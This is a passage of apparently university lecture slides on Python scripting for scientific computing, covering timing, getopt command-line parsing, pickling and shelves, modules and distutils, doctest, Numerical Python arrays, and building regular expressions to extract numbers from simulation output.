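with open(src, 'w') as f:
    f.write("print('Hello, World!')\n")

archive = os.path.join(workdir, 'tmp.tar.gz')
with tarfile.open(archive, 'w:gz') as tar:   # gzip compression
    tar.add(src, arcname='hw.py')            # store under a short name

with tarfile.open(archive, 'r:gz') as tar:
    names = tar.getnames()                   # what is in the archive?
    # read a member as a file object, without extracting to disk:
    content = tar.extractfile('hw.py').read().decode()

shutil.rmtree(workdir)
print(names)
print(content)
```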

![]() | The time module:
import time
e0 = time.time() # elapsed time since the epoch
c0 = time.clock() # total CPU time spent so far
# do tasks...
elapsed_time = time.time() - e0
cpu_time = time.clock() - c0 |
![]() | The os.times function returns a tuple:
os.times()[0] : user time, current process
os.times()[1] : system time, current process
os.times()[2] : user time, child processes
os.times()[3] : system time, child processes
os.times()[4] : elapsed time |
![]() | CPU time = user time + system time |

![]() | Application:
t0 = os.times()
# do tasks...
os.system(time_consuming_command) # child process
t1 = os.times()
elapsed_time = t1[4] - t0[4]
user_time = t1[0] - t0[0]
system_time = t1[1] - t0[1]
cpu_time = user_time + system_time
cpu_time_system_call = t1[2]-t0[2] + t1[3]-t0[3] |
![]() | There is a special Python profiler for finding bottlenecks in scripts (ranks functions according to their CPU-time consumption) |

![]() | a function to call |
![]() | a list of arguments to the function |
![]() | number of calls to make (repetitions) |
![]() | name of function (for printout) |
def timer(func, args, repetitions, func_name):
    t0 = time.time(); c0 = time.clock()
    for i in range(repetitions):
        func(*args) # old style: apply(func, args)
    print '%s: elapsed=%g, CPU=%g' % \
          (func_name, time.time()-t0, time.clock()-c0)
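`time.clock` was removed in Python 3.8. A hedged Python 3 sketch of the same timer idea uses `time.perf_counter` for elapsed time and `time.process_time` for CPU time; returning the numbers instead of printing them is a design choice made here, not part of the slide.

```python
import time

def timer(func, args, repetitions):
    """Call func(*args) repeatedly; return (elapsed, cpu) in seconds."""
    t0 = time.perf_counter()     # wall-clock timer with high resolution
    c0 = time.process_time()     # user + system CPU time of this process
    for _ in range(repetitions):
        func(*args)
    return time.perf_counter() - t0, time.process_time() - c0

# example: time 100 calls of the built-in sum on a range of integers
elapsed, cpu = timer(sum, (range(1000),), 100)
print('sum: elapsed=%g, CPU=%g' % (elapsed, cpu))
```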

![]() | Running through sys.argv[1:] and extracting command-line info 'manually' is easy |
![]() | Using standardized modules and interface specifications is better! |
![]() | Python's getopt and optparse modules parse the command line |
![]() | getopt is the simplest to use |
![]() | optparse is the most sophisticated |

![]() | It is a 'standard' to use either short or long options
-d dirname # short options -d and -h
--directory dirname # long options --directory and --help |
![]() | Short options have single hyphen, long options have double hyphen |
![]() | Options can take a value or not:
--directory dirname --help --confirm
-d dirname -h -i |
![]() | Short options can be combined
-iddirname is the same as -i -d dirname |

![]() | Specify short options by the option letters, followed by colon if the option requires a value |
![]() | Example: 'id:h' |
![]() | Specify long options by a list of option names, where names must end with = if they require a value |
![]() | Example: ['help','directory=','confirm'] |

![]() | getopt returns a list of (option,value) pairs and a list of the remaining arguments |
![]() | Example:
--directory mydir -i file1 file2
makes getopt return
[('--directory','mydir'), ('-i','')]
['file1','file2']
|

![]() | Processing:
import getopt, sys
try:
    options, args = getopt.getopt(sys.argv[1:], 'd:hi',
                                  ['directory=', 'help', 'confirm'])
except getopt.GetoptError:
    # wrong syntax on the command line, illegal options,
    # missing values etc.
    sys.exit(1)
directory = None; confirm = 0 # default values
for option, value in options:
    if option in ('-h', '--help'):
        pass # print usage message
    elif option in ('-d', '--directory'):
        directory = value
    elif option in ('-i', '--confirm'):
        confirm = 1
|

![]() | Equivalent command-line arguments:
-d mydir --confirm src1.c src2.c
--directory mydir -i src1.c src2.c
--directory=mydir --confirm src1.c src2.c |
![]() | Abbreviations of long options are possible, e.g.,
--d mydir --co |
![]() | This one also works: -idmydir |
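The equivalence of these command lines can be verified by feeding explicit argument lists to `getopt.getopt` instead of `sys.argv[1:]`. A sketch in Python 3 syntax; the wrapper function `parse` is invented for the example.

```python
import getopt

def parse(argv):
    """Parse argv (a list of strings) and return (directory, confirm, args)."""
    options, args = getopt.getopt(argv, 'd:hi',
                                  ['directory=', 'help', 'confirm'])
    directory = None; confirm = False        # default values
    for option, value in options:
        if option in ('-d', '--directory'):
            directory = value
        elif option in ('-i', '--confirm'):
            confirm = True
    return directory, confirm, args

r1 = parse(['-d', 'mydir', '--confirm', 'src1.c', 'src2.c'])
r2 = parse(['--directory=mydir', '-i', 'src1.c', 'src2.c'])
r3 = parse(['-idmydir', 'src1.c', 'src2.c'])     # combined short options

# an unknown option raises getopt.GetoptError:
try:
    parse(['--nosuchoption'])
    bad_option_detected = False
except getopt.GetoptError:
    bad_option_detected = True

print(r1, r2, r3, bad_option_detected)
```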

![]() | Write nested lists:
somelist = ['text1', 'text2']
a = [[1.3,somelist], 'some text']
f = open('tmp.dat', 'w')
# convert data structure to its string repr.:
f.write(str(a))
f.close()
|
![]() | Equivalent statements writing to standard output:
print a
sys.stdout.write(str(a) + '\n')
# sys.stdin standard input as file object
# sys.stdout standard output as file object |

![]() | eval(s): treat string s as Python code |
![]() | a = eval(str(a)) is a valid 'equation' for basic Python data structures |
![]() | Example: read nested lists
f = open('tmp.dat', 'r') # file written in last slide
# evaluate first line in file as Python code:
newa = eval(f.readline())
results in
[[1.3, ['text1', 'text2']], 'some text']
# i.e.
newa = eval(f.readline())
# is the same as
newa = [[1.3, ['text1', 'text2']], 'some text'] |

![]() | str(a) is implemented as an object function
__str__ |
![]() | repr(a) is implemented as an object function
__repr__ |
![]() | str(a): pretty print of an object |
![]() | repr(a): print of all info for use with eval |
![]() | a = eval(repr(a)) |
![]() | str and repr are identical for standard Python objects (lists, dictionaries, numbers) |
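The identity `a = eval(repr(a))` is easy to check for a nested list. The sketch below (Python 3 syntax) also shows `ast.literal_eval`, a standard-library alternative, brought in here as an addition to the slides, that accepts only Python literals and is therefore safer when the text comes from an untrusted file.

```python
import ast

a = [[1.3, ['text1', 'text2']], 'some text']

text = repr(a)                   # string that can be turned back into the object
b = eval(text)                   # evaluates arbitrary Python code
c = ast.literal_eval(text)       # accepts literals only (lists, numbers, strings, ...)

print(text)
print(a == b == c)
```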

![]() | Many programs need to have persistent data structures, i.e., data live after the program is terminated and can be retrieved the next time the program is executed |
![]() | str, repr and eval are convenient for making data structures persistent |
![]() | pickle, cPickle and shelve are other (more sophisticated) Python modules for storing/loading objects |

![]() | Write any set of data structures to file using
the cPickle module:
f = open(filename, 'w')
import cPickle
cPickle.dump(a1, f)
cPickle.dump(a2, f)
cPickle.dump(a3, f)
f.close() |
![]() | Read data structures in again later:
f = open(filename, 'r')
a1 = cPickle.load(f)
a2 = cPickle.load(f)
a3 = cPickle.load(f) |
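In Python 3 the `cPickle` module is gone; `pickle` uses the fast implementation automatically, and files must be opened in binary mode. A sketch of the same dump/load sequence under those assumptions, with made-up data and a temporary file:

```python
import os
import pickle
import tempfile

a1 = [1, 2.5, 'text']
a2 = {'refine': False}
a3 = (1, (2, 3))

fd, filename = tempfile.mkstemp()    # temporary file for the demo
os.close(fd)

with open(filename, 'wb') as f:      # binary mode is required in Python 3
    for obj in (a1, a2, a3):
        pickle.dump(obj, f)

with open(filename, 'rb') as f:      # objects come back in the order they were dumped
    b1 = pickle.load(f)
    b2 = pickle.load(f)
    b3 = pickle.load(f)

os.remove(filename)
print(b1, b2, b3)
```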

![]() | Think of shelves as dictionaries with file storage
import shelve
database = shelve.open(filename)
database['a1'] = a1 # store a1 under the key 'a1'
database['a2'] = a2
database['a3'] = a3
# or
database['a123'] = (a1, a2, a3)
# retrieve data:
if 'a1' in database:
a1 = database['a1']
# and so on
# delete an entry:
del database['a2']
database.close()
|

>>> a = 3 # a refers to int object with value 3
>>> b = a # b refers to a (int object with value 3)
>>> id(a), id(b) # print integer identifications of a and b
(135531064, 135531064)
>>> id(a) == id(b) # same identification?
True # a and b refer to the same object
>>> a is b # alternative test
True
>>> a = 4 # a refers to a (new) int object
>>> id(a), id(b) # let's check the IDs
(135532056, 135531064)
>>> a is b
False
>>> b # b still refers to the int object with value 3
3

>>> a = [2, 6] # a refers to a list [2, 6]
>>> b = a # b refers to the same list as a
>>> a is b
True
>>> a = [1, 6, 3] # a refers to a new list
>>> a is b
False
>>> b # b still refers to the old list
[2, 6]
>>> a = [2, 6]
>>> b = a
>>> a[0] = 1 # make in-place changes in a
>>> a.append(3) # another in-place change
>>> a
[1, 6, 3]
>>> b
[1, 6, 3]
>>> a is b # a and b refer to the same list object
True

![]() | What if we want b to be a copy of a? |
![]() | Lists: a[:] extracts a slice, which is a copy of all
elements:
>>> b = a[:] # b refers to a copy of elements in a
>>> b is a
False
In-place changes in a will not affect b |
![]() | Dictionaries: use the copy method:
>>> a = {'refine': False}
>>> b = a.copy()
>>> b is a
False
In-place changes in a will not affect b
|
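One caveat worth a small experiment: `a[:]` and `a.copy()` make shallow copies, so nested mutable objects are still shared. The sketch below (Python 3 syntax) contrasts this with `copy.deepcopy` from the standard library, which is an addition to what the slides cover.

```python
import copy

a = [[1, 2], 3]
b = a[:]                 # shallow copy: new outer list, same inner list
c = copy.deepcopy(a)     # deep copy: inner list is copied too

a.append(4)              # change of the outer list: not visible in b or c
a[0][0] = 'changed'      # change of the shared inner list: visible in b

print(a)
print(b)
print(c)
```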

![]() | Parnassus is a large collection of Python modules, see link from www.python.org |
![]() | Do not reinvent the wheel, search Parnassus! |


![]() | Making a module |
![]() | Making Python aware of modules |
![]() | Packages |
![]() | Distributing and installing modules |

![]() | Appendix B.1 in the course book |
![]() | Python electronic documentation: Distributing Python Modules, Installing Python Modules |

![]() | Reuse scripts by wrapping them in classes or functions |
![]() | Collect classes and functions in library modules |
![]() | How? just put classes and functions in a file MyMod.py |
![]() | Put MyMod.py in one of the directories where Python can find it (see next slide) |
![]() | Say
import MyMod
# or
import MyMod as M # M is a short form
# or
from MyMod import *
# or
from MyMod import myspecialfunction, myotherspecialfunction
in any script |

![]() | Python has some 'official' module directories, typically
/usr/lib/python2.3
/usr/lib/python2.3/site-packages
+ current working directory |
![]() | The environment variable PYTHONPATH may contain additional directories with modules
unix> echo $PYTHONPATH
/home/me/python/mymodules:/usr/lib/python2.2:/home/you/yourlibs |
![]() | Python's sys.path list contains the directories where Python searches for modules |
![]() | sys.path contains the 'official' directories, plus those in PYTHONPATH |

![]() | In a Unix Bash environment, environment variables are normally set in .bashrc:
export PYTHONPATH=$HOME/pylib:$scripting/src/tools |
![]() | Check the contents:
unix> echo $PYTHONPATH |
![]() | In a Windows environment one can do the same in autoexec.bat:
set PYTHONPATH=C:\pylib;%scripting%\src\tools |
![]() | Check the contents:
dos> echo %PYTHONPATH% |
![]() | Note: it is easy to make mistakes; PYTHONPATH may be different from what you think, so check sys.path |

![]() | Copy your module file(s) to a directory already contained in sys.path
unix or dos> python -c 'import sys; print sys.path' |
![]() | Can extend PYTHONPATH
# Bash syntax:
export PYTHONPATH=$PYTHONPATH:/home/me/python/mymodules |
![]() | Can extend sys.path in the script:
sys.path.insert(0, '/home/me/python/mynewmodules')
(insert first in the list) |

![]() | A class of modules can be collected in a package |
![]() | Normally, a package is organized as module files in a directory tree |
![]() | Each subdirectory has a file __init__.py (can be empty) |
![]() | Packages allow ``dotted module names'' like
MyMod.numerics.pde.grids
reflecting a file MyMod/numerics/pde/grids.py |

![]() | Can import modules in the tree like this:
from MyMod.numerics.pde.grids import fdm_grids
grid = fdm_grids()
grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
...
Here, class fdm_grids is in module grids (file grids.py) in the directory MyMod/numerics/pde |
![]() | Or
import MyMod.numerics.pde.grids
grid = MyMod.numerics.pde.grids.fdm_grids()
grid.domain(xmin=0, xmax=1, ymin=0, ymax=1)
# or
import MyMod.numerics.pde.grids as Grid
grid = Grid.fdm_grids()
grid.domain(xmin=0, xmax=1, ymin=0, ymax=1) |
![]() | See ch. 6 of the Python Tutorial (part of the electronic doc) |

![]() | Module files can have a test/demo script at the end:
if __name__ == '__main__':
    infile = sys.argv[1]; outfile = sys.argv[2]
    for i in sys.argv[3:]:
        create(infile, outfile, i)
|
![]() | The block is executed if the module file is run as a script |
![]() | The tests at the end of a module often serve as good examples on the usage of the module |

![]() | Python convention: add a leading underscore to non-public functions and (module) variables
_counter = 0
def _filename():
    """Generate a random filename."""
    ...
|
![]() | After a standard import import MyMod, we may access
MyMod._counter
n = MyMod._filename()
but after a from MyMod import * the names with leading underscore are not available |
![]() | Use the underscore to tell users what is public and what is not |
![]() | Note: non-public parts can be changed in future releases |

![]() | Python has its own build/installation system: Distutils |
![]() | Build: compile (Fortran, C, C++) into module (only needed when modules employ compiled code) |
![]() | Installation: copy module files to ``install'' directories |
![]() | Publish: make module available for others through PyPI |
![]() | Default installation directory:
os.path.join(sys.prefix, 'lib', 'python' + sys.version[0:3],
'site-packages')
# e.g. /usr/lib/python2.3/site-packages
|
![]() | Distutils relies on a setup.py script |

![]() | Say we want to distribute two modules in two files
MyMod.py mymodcore.py |
![]() | Typical setup.py script for this case:
#!/usr/bin/env python
from distutils.core import setup
setup(name='MyMod',
version='1.0',
description='Python module example',
author='Hans Petter Langtangen',
author_email='hpl@ifi.uio.no',
url='http://www.simula.no/pymod/MyMod',
py_modules=['MyMod', 'mymodcore'],
)
|

![]() | Modules can also make use of Fortran, C, C++ code |
![]() | setup.py can also list C and C++ files; these will be compiled with the same options/compiler as used for Python itself |
![]() | SciPy has an extension of Distutils for ``intelligent'' compilation of Fortran files |
![]() | Note: setup.py eliminates the need for makefiles |
![]() | Examples of such setup.py files are provided in the section on mixing Python with Fortran, C and C++ |

![]() | Standard command:
python setup.py install |
![]() | If the module contains files to be compiled, a two-step procedure can be invoked
python setup.py build # compiled files and modules are made in subdir. build/
python setup.py install |

![]() | setup.py has many options |
![]() | Control the destination directory for installation:
python setup.py install --home=$HOME/install
# copies modules to /home/hpl/install/lib/python |
![]() | Make sure that /home/hpl/install/lib/python is registered in your PYTHONPATH |

![]() | Go to the official electronic Python documentation |
![]() | Look up ``Distributing Python Modules'' (for packing modules in setup.py scripts) |
![]() | Look up ``Installing Python Modules'' (for running setup.py with various options) |


| How to document usage of Python functions, classes, modules | |
| Automatic testing of code (through doc strings) |

![]() | App. B.1/B.2 in the course book |
![]() | HappyDoc, Pydoc, Epydoc manuals |
![]() | Style guide for doc strings (see doc.html) |

![]() | Doc strings = first string in functions, classes, files |
![]() | Put user information in doc strings:
def ignorecase_sort(a, b):
    """Compare strings a and b, ignoring case."""
    ...
|
![]() | The doc string is available at run time and explains the purpose and usage of the function:
>>> print ignorecase_sort.__doc__
Compare strings a and b, ignoring case. |

![]() | Doc string in a class:
class MyClass:
    """Fake class just for exemplifying doc strings."""
    def __init__(self):
        ...
|
![]() | The doc string of a module is an (often multi-line) string at the top of the file
"""
This module is a fake module for exemplifying multi-line doc strings.
""" |

![]() | The doc string serves two purposes: |
![]() | HappyDoc: Tool that can extract doc strings and automatically produce overview of Python classes, functions etc. |
![]() | Doc strings can, e.g., be used as balloon help in sophisticated GUIs (cf. IDLE) |
![]() | Providing doc strings is a good habit! |

![]() | PEP 257 "Docstring Conventions" from http://www.python.org/dev/peps/ |
![]() | Use triple double quoted strings as doc strings |
![]() | Use complete sentences, ending in a period
def somefunc(a, b):
"""Compare a and b."""
|

![]() | The doctest module enables automatic testing of interactive Python sessions embedded in doc strings
class StringFunction:
    """
    Make a string expression behave as a Python function
    of one variable.
    Examples on usage:
    >>> from StringFunction import StringFunction
    >>> f = StringFunction('sin(3*x) + log(1+x)')
    >>> p = 2.0; v = f(p) # evaluate function
    >>> p, v
    (2.0, 0.81919679046918392)
    >>> f = StringFunction('1+t', independent_variables='t')
    >>> v = f(1.2) # evaluate function of t=1.2
    >>> print "%.2f" % v
    2.20
    >>> f = StringFunction('sin(t)')
    >>> v = f(1.2) # evaluate function of t=1.2
    Traceback (most recent call last):
        v = f(1.2)
    NameError: name 't' is not defined
    """
|

![]() | Class StringFunction is contained in the module StringFunction |
![]() | Let StringFunction.py execute two statements when run as a script:
def _test():
    import doctest, StringFunction
    return doctest.testmod(StringFunction)
if __name__ == '__main__':
    _test()
|
![]() | Run the test:
python StringFunction.py # no output: all tests passed
python StringFunction.py -v # verbose output |
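Since the StringFunction module is not reproduced here, the mechanism can be tried on a stand-in. The sketch below (Python 3 syntax) defines a hypothetical function `average` with an interactive session in its doc string and runs the embedded tests with `doctest.DocTestFinder` and `doctest.DocTestRunner`; in a module file one would normally just call `doctest.testmod()` as shown above.

```python
import doctest

def average(numbers):
    """Return the arithmetic mean of a sequence of numbers.

    >>> average([1, 2, 3])
    2.0
    >>> average([])
    Traceback (most recent call last):
        ...
    ValueError: empty sequence
    """
    if not numbers:
        raise ValueError('empty sequence')
    return sum(numbers) / float(len(numbers))

# collect the examples from the doc string and run them:
finder = doctest.DocTestFinder()
runner = doctest.DocTestRunner(verbose=False)
for test in finder.find(average, 'average', module=False,
                        globs={'average': average}):
    runner.run(test)
results = runner.summarize(verbose=False)   # has .failed and .attempted

print('failed: %d, attempted: %d' % (results.failed, results.attempted))
```

For an expected exception, doctest compares only the exception type and message, so the traceback body can be abbreviated with `...`.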


![]() | Efficient array computing in Python |
![]() | Creating arrays |
![]() | Indexing/slicing arrays |
![]() | Random numbers |
![]() | Linear algebra |

![]() | Ch. 4 in the course book |
![]() | Numeric, numarray, or numpy manual |

![]() | NumPy enables efficient numerical computing in Python |
![]() | NumPy is a Python/C package which offers efficient arrays (contiguous storage) and mathematical operations in C |
![]() | Classic and widely used Numeric module:
from Numeric import * |
![]() | Numarray alternative:
from numarray import * |
![]() | numpy - a third ``replacement'' implementation:
from numpy import * |
![]() | Numerical Python contains other modules as well - these have slightly different names and features in the three implementations :-( |

![]() | Most probably we will have to live with three implementations |
![]() | We have made a small interface layer (module) numpytools and added some extra functions
from py4cs.numpytools import * |
![]() | This module provides a unified interface to Numeric, numarray, and numpy, based on the ``least common denominator'' principle (use only functionality that is present in all three packages) |

from py4cs.numpytools import *
# or from Numeric import *
# or from numpy import *
# create an array a of length n, with zeroes and
# double precision float type:
a = zeros(n, Float)
# create an array x with values from -5 to 4.5 in steps of 0.5:
x = arrayrange(-5, 5, 0.5, Float)
# better: use sequence from py4cs.numpytools (5 is included):
x = sequence(-5, 5, 0.5) # -5, -4.5, ..., 5.0
# it is trivial to make accompanying y values:
y = sin(x/2.0)*3.0
# create a NumPy array from a Python list:
pl = [0, 1.2, 4, -9.1, 5, 8]
a = array(pl, typecode=Float) # (can omit typecode)
a.shape = (2,3) # turn a into a 2x3 matrix
a.shape = (size(a),) # back to vector

b = 3*a - 1
# in-place (memory saving) alternative:
b = a
multiply(b, 3, b) # b = 3*b
subtract(b, 1, b) # b = b -1
# standard mathematical functions:
c = sin(b)
c = arcsin(c)
c = sinh(b)
c = b**2.5 # power function
c = log(b)
c = sqrt(b)
# subscripting:
a[2:4] = -1 # set a[2] and a[3] to -1
a[-1] = a[0] # set last element equal to first one
a.shape = (3,2)
print a[:,0] # print first column
print a[:,1::2] # print second column with stride 2

![]() | arange and arrayrange (synonym) are supposed not to include the upper limit (like range and xrange) |
![]() | Try out
nerrors = 0
for n in range(1, 101):
    x1 = arange(0, 1, 1./n)[-1] # should be less than 1
    print n, x1
    if x1 == 1.0: nerrors += 1
print 'leading to', nerrors, 'unexpected cases'
|
![]() | 58 (random!) cases out of 100 gave unexpected behavior! |

![]() | Stay away from arange and arrayrange, use
seq (or sequence) and iseq (or isequence)
from numpytools instead:
from py4cs.numpytools import *
x = seq(0, 1, 1./n)
I = iseq(0, 100, 2) # includes 100 |
![]() | numpy.linspace is a similar alternative |

from Numeric import *
import RandomArray
RandomArray.seed(1928,1277) # set seed
# seed() provides a seed based on current time
print 'mean of %d uniform random numbers:' % n
u = RandomArray.random(n) # uniform numbers on (0,1)
print 'on (0,1):', sum(u)/n, '(should be 0.5)'
u = RandomArray.uniform(-1,1,n) # uniform numbers on (-1,1)
print 'on (-1,1):', sum(u)/n, '(should be 0)'
mean = 0.0; stdev = 1.0
u = RandomArray.normal(mean, stdev, n)
m = sum(u)/n # empirical mean
s = sqrt(sum((u - m)**2)/(n-1)) # empirical st.dev.
print 'generated %d N(0,1) samples with\nmean %g '\
      'and st.dev. %g using RandomArray.normal' % (n, m, s)

![]() | Continuation of last slide |
![]() | Find the probability that normal samples are less than 1.5:
u = RandomArray.normal(mean, stdev, n)
less_than = u < 1.5
# less_than[i] is 1 if u[i]<1.5, otherwise 0, i.e.,
# less_than is an array like (0,0,1,1,0,0,1,0,...0,1,0)
p = sum(less_than)
prob = p/float(n)
print "probability=%.2f" % prob |
![]() | Vectorized operations give high efficiency, but require a different way of thinking |

![]() |
A Python module, pymat, enables communication with Matlab:
from Numeric import *
import math, pymat
x = arrayrange(0, 4*math.pi, 0.1)
m = pymat.open()
# can send NumPy arrays to Matlab:
pymat.put(m, 'x', x);
pymat.eval(m, 'y = sin(x)')
pymat.eval(m, 'plot(x,y)')
# get a new NumPy array back:
y = pymat.get(m, 'y') |


![]() | Motivation for regular expressions |
![]() | Regular expression syntax |
![]() | Lots of examples on problem solving with regular expressions |
![]() | Many examples related to scientific computations |

![]() | Ch. 8.2 in the course book |
![]() | Regular Expression HOWTO for Python (see doc.html) |
![]() | perldoc perlrequick (intro), perldoc perlretut (tutorial), perldoc perlre (full reference) |
![]() | ``Text Processing in Python'' by Mertz (Python syntax) |
![]() | ``Mastering Regular Expressions'' by Friedl (Perl syntax) |
![]() | Note: the core syntax is the same in Perl, Python, Ruby, Tcl, Egrep, Vi/Vim, Emacs, ..., so books about these tools also provide info on regular expressions |

![]() | Consider a simulation code with this type of output:
t=2.5 a: 1.0 6.2 -2.2 12 iterations and eps=1.38756E-05 t=4.25 a: 1.0 1.4 6 iterations and eps=2.22433E-05 >> switching from method AQ4 to AQP1 t=5 a: 0.9 2 iterations and eps=3.78796E-05 t=6.386 a: 1.0 1.1525 6 iterations and eps=2.22433E-06 >> switching from method AQP1 to AQ2 t=8.05 a: 1.0 3 iterations and eps=9.11111E-04 ... | ||||
![]() | You want to make two graphs: iterations vs t, and eps vs t |
![]() | How can you extract the relevant numbers from the text? |

![]() | Some structure in the text, but line.split() is too simple (different no of columns/words in each line) |
![]() | Regular expressions constitute a powerful language for formulating structure and extracting parts of a text |
![]() | Regular expressions look cryptic for the novice |
![]() | regex/regexp: abbreviations for regular expression |

t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
![]() | Structure: t=, number, 2 blanks, a:, some numbers, 3 blanks, integer, ' iterations and eps=', number |
![]() | Regular expressions constitute a language for specifying such structures |
![]() | Formulation in terms of a regular expression:
t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
|

![]() |
A regex usually contains special characters introducing freedom in the text:
t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
t=6.386  a: 1.0 1.1525   6 iterations and eps=2.22433E-06
. any character
.* zero or more . (i.e. any sequence of characters)
(.*) can extract the match for .* afterwards
\s whitespace (spacebar, newline, tab)
\s{2} two whitespace characters
a: exact text
.* arbitrary text
\s+ one or more whitespace characters
\d+ one or more digits (i.e. an integer)
(\d+) can extract the integer later
iterations and eps= exact text
|

import re

pattern = \
r"t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)"
t = []; iterations = []; eps = []
# the output to be processed is stored in the list of lines
for line in lines:
    match = re.search(pattern, line)
    if match:
        t.append(float(match.group(1)))
        iterations.append(int(match.group(2)))
        eps.append(float(match.group(3)))

![]() | Output text to be interpreted:
t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05
t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05
>> switching from method AQ4 to AQP1
t=5  a: 0.9   2 iterations and eps=3.78796E-05
t=6.386  a: 1 1.15   6 iterations and eps=2.22433E-06
>> switching from method AQP1 to AQ2
t=8.05  a: 1.0   3 iterations and eps=9.11111E-04
|
![]() | Extracted Python lists:
t = [2.5, 4.25, 5.0, 6.386, 8.05]
iterations = [12, 6, 2, 6, 3]
eps = [1.38756e-05, 2.22433e-05, 3.78796e-05,
2.22433e-06, 9.11111E-04]
|
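The extraction above can be tried end to end with the following minimal sketch. It assumes the spacing described earlier (two blanks before a:, whitespace before the iteration count), wraps the loop in a hypothetical helper named extract, and is written to run unchanged under Python 3.

```python
import re

# Sample simulator output, copied from the slide (spacing is an assumption:
# two blanks before "a:", three blanks before the iteration count).
text = """\
t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05
t=4.25  a: 1.0 1.4   6 iterations and eps=2.22433E-05
>> switching from method AQ4 to AQP1
t=5  a: 0.9   2 iterations and eps=3.78796E-05
t=6.386  a: 1 1.15   6 iterations and eps=2.22433E-06
>> switching from method AQP1 to AQ2
t=8.05  a: 1.0   3 iterations and eps=9.11111E-04
"""

pattern = r"t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)"

def extract(lines):
    """Hypothetical helper: collect t, iterations and eps from matching lines."""
    t, iterations, eps = [], [], []
    for line in lines:
        match = re.search(pattern, line)
        if match:  # lines such as '>> switching ...' are skipped
            t.append(float(match.group(1)))
            iterations.append(int(match.group(2)))
            eps.append(float(match.group(3)))
    return t, iterations, eps

t, iterations, eps = extract(text.splitlines())
```

The three lists can then be handed to any plotting tool to produce the two graphs.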

![]() | Consider the regex
t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)
compared with the previous regex
t=(.*)\s{2}a:.*\s+(\d+) iterations and eps=(.*)
|
![]() | Less structure |
![]() | How 'exact' does a regex need to be? |
![]() | The degree of preciseness depends on the probability of making a wrong match |

![]() | Suppose we change the regular expression to
t=(.*)\s+a:.*(\d+).*=(.*) |
![]() | It works on most lines in our test text but not on
t=2.5 a: 1 6 -2 12 iterations and eps=1.38756E-05 |
![]() | 2 instead of 12 (iterations) is extracted (why? see later) |
![]() | Regular expressions constitute a powerful tool, but you need to develop understanding and experience |
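The wrong match can be reproduced with a small sketch. The names strict and loose are introduced here for illustration only, and the spacing of the test line is assumed.

```python
import re

line = "t=2.5  a: 1 6 -2   12 iterations and eps=1.38756E-05"

# Regex that requires whitespace on both sides of the integer.
strict = r"t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)"
# Regex without that requirement: the greedy .* in front of (\d+)
# swallows as much as it can and leaves only one digit for the group.
loose = r"t=(.*)\s+a:.*(\d+).*=(.*)"

strict_iterations = re.search(strict, line).group(2)
loose_iterations = re.search(loose, line).group(2)
```

Here strict_iterations holds the full integer, while loose_iterations holds only its last digit.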

.        # any single character except a newline
^        # the beginning of the line or string
$        # the end of the line or string
*        # zero or more of the last character
+        # one or more of the last character
?        # zero or one of the last character
[A-Z]    # matches all upper case letters
[abc]    # matches either a or b or c
[^b]     # does not match b
[^a-z]   # does not match lower case letters

.*       # any sequence of characters (except newline)
[.*]     # the characters . and *
^no      # the string 'no' at the beginning of a line
[^no]    # neither n nor o
A-Z      # the 3-character string 'A-Z' (A, minus, Z)
[A-Z]    # one of the chars A, B, C, ..., X, Y, or Z

![]() | The OR operator:
(eg|le)gs # matches eggs or legs |
![]() | Short forms of common expressions:
\n # a newline
\t # a tab
\w # any alphanumeric (word) character
# the same as [a-zA-Z0-9_]
\W # any non-word character
# the same as [^a-zA-Z0-9_]
\d # any digit, same as [0-9]
\D # any non-digit, same as [^0-9]
\s # any whitespace character: space,
# tab, newline, etc
\S # any non-whitespace character
\b # a word boundary, outside [] only
\B # no word boundary
|

\. # a dot
\| # vertical bar
\[ # an open square bracket
\) # a closing parenthesis
\* # an asterisk
\^ # a hat
\/ # a slash
\\ # a backslash
\{ # a curly brace
\? # a question mark


The part of the string that matches the regex is high-lighted

![]() | Different ways of writing real numbers: -3, 42.9873, 1.23E+1, 1.2300E+01, 1.23e+01 |
![]() | Three basic forms: integer (-3), decimal notation (42.9873), scientific notation (1.23E+1) |

![]() | Could just collect the legal characters in the three notations:
[0-9.Ee\-+]+ |
![]() | Downside: this matches text like
12-24 24.- --E1-- +++++ |
![]() | How can we define precise regular expressions for the three notations? |

![]() | Regex for decimal notation:
-?\d*\.\d+
# or equivalently (\d is [0-9])
-?[0-9]*\.[0-9]+
|
![]() | Problem: this regex does not match '3.' |
![]() | The fix
-?\d*\.\d*
is ok but matches text like '-.' and (much worse!) '.' |
![]() | Trying it on
'some text. 4. is a number.'
gives a match for the first period! |

![]() | We need a digit before OR after the dot |
![]() | The fix:
-?(\d*\.\d+|\d+\.\d*) |
![]() | A more compact version (just "OR-ing" numbers without digits after the dot):
-?(\d*\.\d+|\d+\.) |

![]() | Make a regex for integer or decimal notation:
(integer OR decimal notation)
using the OR operator and parentheses:
-?(\d+|(\d+\.\d*|\d*\.\d+))
|
![]() | Problem: 22.432 gives a match for 22, because the first alternative (just digits) already succeeds on 22 and the decimal alternative is never tried |

![]() | Remedy: test for the most complicated pattern first
(decimal notation OR integer)
-?((\d+\.\d*|\d*\.\d+)|\d+)
|
![]() | Modularize the regex:
real_in = r'\d+'
real_dn = r'(\d+\.\d*|\d*\.\d+)'
real = '-?(' + real_dn + '|' + real_in + ')'
|

![]() | Write a regex for numbers in scientific notation |
![]() | Typical text: 1.27635E+01, -1.27635e+1 |
![]() | Regular expression:
-?\d\.\d+[Ee][+\-]\d\d? |
![]() | = optional minus, one digit, dot, at least one digit, E or e, plus or minus, one digit, optional digit |

![]() | Problem: 1e+00 and 1e1 are not handled |
![]() | Remedy: optional dot, zero or more digits behind the dot, optional sign in exponent, more digits in the exponent (1e001):
-?\d\.?\d*[Ee][+\-]?\d+ |

![]() | A pattern for integer or decimal notation:
-?((\d+\.\d*|\d*\.\d+)|\d+) |
![]() | Can get rid of an OR by allowing the dot and digits behind the dot be optional:
-?(\d+(\.\d*)?|\d*\.\d+) |
![]() | Such a number, followed by an optional exponent (a la e+02), makes up a general real number (!)
